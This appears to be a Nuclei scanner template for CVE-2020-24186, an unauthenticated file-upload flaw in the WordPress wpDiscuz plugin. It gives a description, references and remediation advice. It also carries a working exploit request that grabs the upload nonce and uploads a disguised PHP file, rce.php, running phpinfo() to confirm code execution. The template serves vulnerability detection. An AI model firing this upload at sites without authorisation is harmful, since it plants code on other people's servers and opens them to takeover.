WordPress wpDiscuz <=7.0.4 - Remote Code Execution

id: CVE-2020-24186

info:
  name: WordPress wpDiscuz <=7.0.4 - Remote Code Execution
  author: Ganofins
  severity: critical
  description: WordPress wpDiscuz plugin versions  version 7.0 through 7.0.4 are susceptible to remote code execution. This flaw gave unauthenticated attackers the ability to upload arbitrary files, including PHP files, and achieve remote code execution on a vulnerable site's server.
  impact: |
    Successful exploitation of this vulnerability can lead to arbitrary code execution on the affected WordPress site.
  remediation: |
    Update the wpDiscuz plugin to the latest version (>=7.0.5) to mitigate this vulnerability.
  reference:
    - https://github.com/suncsr/wpDiscuz_unauthenticated_arbitrary_file_upload/blob/main/README.md
    - https://nvd.nist.gov/vuln/detail/CVE-2020-24186
    - https://www.wordfence.com/blog/2020/07/critical-arbitrary-file-upload-vulnerability-patched-in-wpdiscuz-plugin/
    - http://packetstormsecurity.com/files/162983/WordPress-wpDiscuz-7.0.4-Shell-Upload.html
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2020-24186
    cwe-id: CWE-434
    epss-score: 0.97489
    epss-percentile: 0.99973
    cpe: cpe:2.3:a:gvectors:wpdiscuz:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: gvectors
    product: wpdiscuz
    framework: wordpress
  tags: cve,cve2020,rce,fileupload,packetstorm,wordpress,wp-plugin,intrusive,gvectors

http:
  - raw:
      - |
        GET /?p=1 HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: XMLHttpRequest
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary88AhjLimsDMHU1Ak
        Origin: {{BaseURL}}
        Referer: {{BaseURL}}

        ------WebKitFormBoundary88AhjLimsDMHU1Ak
        Content-Disposition: form-data; name="action"

        wmuUploadFiles
        ------WebKitFormBoundary88AhjLimsDMHU1Ak
        Content-Disposition: form-data; name="wmu_nonce"

        {{wmuSecurity}}
        ------WebKitFormBoundary88AhjLimsDMHU1Ak
        Content-Disposition: form-data; name="wmuAttachmentsData"

        undefined
        ------WebKitFormBoundary88AhjLimsDMHU1Ak
        Content-Disposition: form-data; name="wmu_files[0]"; filename="rce.php"
        Content-Type: image/png

        {{base64_decode('/9j/4WpFeGlmTU0q/f39af39Pv39/f39/f39/f2o/f39/cD9/f39/f39/f39/f/g/UpGSUb9/f39/9tD/f0M/QwK/f0=')}}
        <?php phpinfo();?>
        ------WebKitFormBoundary88AhjLimsDMHU1Ak
        Content-Disposition: form-data; name="postId"

        1
        ------WebKitFormBoundary88AhjLimsDMHU1Ak--

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'success":true'
          - 'fullname'
          - 'shortname'
          - 'url'
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: wmuSecurity
        group: 1
        regex:
          - 'wmuSecurity":"([a-z0-9]+)'
        internal: true
        part: body

      - type: regex
        group: 1
        regex:
          - '"url":"([a-z:\\/0-9-.]+)"'
        part: body
# digest: 4a0a00473045022072ed0f4b5782100ff0dee8c88d2f3d5fe97194113652c1db44b0c64922842561022100929951c15416da76ada640267baafb313d4fde4abed2bdfc1e9783b5f6d0a279:922c64590222798bb761d5b6d8e72950